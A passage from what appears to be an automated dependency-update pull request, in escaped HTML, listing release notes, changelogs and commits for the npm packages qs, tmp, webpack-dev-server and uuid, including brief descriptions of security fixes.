permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: properly account for \u003ccode\u003estrictNullHandling\u003c/code\u003e when \u003ccode\u003eallowEmptyArrays\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog indentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: parse encoded square brackets (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/506\"\u003e#506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] add CII best practices badge\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: Disable \u003ccode\u003edecodeDotInKeys\u003c/code\u003e by default to restore previous behavior (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/501\"\u003e#501\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Performance] \u003ccode\u003eutils\u003c/code\u003e: Optimize performance under large data volumes, reduce memory usage, and speed up processing (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/502\"\u003e#502\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eutils\u003c/code\u003e: use \u003ccode\u003e+=\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: add \u003ccode\u003edecodeDotInKeys\u003c/code\u003e/\u003ccode\u003eencodeDotKeys\u003c/code\u003e options (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003eduplicates\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: add \u003ccode\u003eallowEmptyArrays\u003c/code\u003e option to allow [] in object values (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e/\u003ccode\u003estringify\u003c/code\u003e: move allowDots config logic to its own variable\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003estringify\u003c/code\u003e: move option-handling code into \u003ccode\u003enormalizeStringifyOptions\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] update readme, add logos (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] \u003ccode\u003estringify\u003c/code\u003e: clarify default \u003ccode\u003earrayFormat\u003c/code\u003e behavior\u003c/li\u003e\n\u003cli\u003e[readme] fix line wrapping\u003c/li\u003e\n\u003cli\u003e[readme] remove dead badges\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[meta] make the dist build 50% smaller\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003esideEffects\u003c/code\u003e flag\u003c/li\u003e\n\u003cli\u003e[meta] run build in prepack, not prepublish\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003eparse\u003c/code\u003e: remove useless tests; add coverage\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Tests] use \u003ccode\u003emock-property\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: improve coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config \u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e, \u003ccode\u003ehas-override-mistake\u003c/code\u003e, \u003ccode\u003ehas-property-descriptors\u003c/code\u003e, \u003ccode\u003emock-property\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003eglob\u003c/code\u003e, since v10.3.8+ requires a broken \u003ccode\u003ejackspeak\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5cf516c0dd557d85d5f18d4a916c96cd9cfc2305\"\u003e\u003ccode\u003e5cf516c\u003c/code\u003e\u003c/a\u003e v6.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/8d56df2c86ff7bb42c72329c827dacb14a74107d\"\u003e\u003ccode\u003e8d56df2\u003c/code\u003e\u003c/a\u003e [New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictDepth\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/c9a6694ccda24441e499106d88fb0c84756862b3\"\u003e\u003ccode\u003ec9a6694\u003c/code\u003e\u003c/a\u003e [Tests] use \u003ccode\u003enpm audit\u003c/code\u003e instead of \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f90cc35dd65c7099c35ae75d7a1a67aab85220e1\"\u003e\u003ccode\u003ef90cc35\u003c/code\u003e\u003c/a\u003e v6.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1bf9f7a7f5efb3888f3653137f90a96f32fe95ff\"\u003e\u003ccode\u003e1bf9f7a\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: properly account for \u003ccode\u003estrictNullHandling\u003c/code\u003e when \u003ccode\u003eallowEmptyArrays\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/7ebf48b42a4780b3b0b18f12be727bd57a49256b\"\u003e\u003ccode\u003e7ebf48b\u003c/code\u003e\u003c/a\u003e [meta] fix changelog indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/d0dff11f06be1b2588e62865f5e4aa91f2dabafb\"\u003e\u003ccode\u003ed0dff11\u003c/code\u003e\u003c/a\u003e v6.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f0b8d032034933adcc60b5f83dbcb8cdfb868dbd\"\u003e\u003ccode\u003ef0b8d03\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/81835ff51d852c97e364eff78bbb8c58072aca71\"\u003e\u003ccode\u003e81835ff\u003c/code\u003e\u003c/a\u003e [Fix]: \u003ccode\u003eparse\u003c/code\u003e: parse encoded square brackets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/db47dccb5819fc10f616a1f036798e4788ae06a8\"\u003e\u003ccode\u003edb47dcc\u003c/code\u003e\u003c/a\u003e [readme] add CII best practices badge\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.2...v6.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tmp` from 0.2.5 to 0.2.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8ea1f37d75c67569e0f151448330d52f7babf211\"\u003e\u003ccode\u003e8ea1f37\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8f24f788a356b5d45c9bec894632bd4931338153\"\u003e\u003ccode\u003e8f24f78\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/ce787f37aaacccad921ae90990c9da33481fe59c\"\u003e\u003ccode\u003ece787f3\u003c/code\u003e\u003c/a\u003e Reject non-string prefix, postfix, template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.2.5...v0.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 13.0.0 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug 